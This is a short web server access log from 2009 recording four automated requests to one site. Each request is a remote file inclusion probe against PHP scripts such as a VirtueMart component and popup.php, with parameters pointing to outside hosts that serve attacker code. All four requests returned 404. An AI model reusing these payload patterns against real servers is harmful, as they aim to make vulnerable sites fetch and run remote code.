201.232.54.48 - - [28/Apr/2009:09:17:09 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:17:23 -0700] "GET /logs/access_080817.log/popup.php?path=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:17:24 -0700] "GET /popup.php?path=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:17:24 -0700] "GET /logs/popup.php?path=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
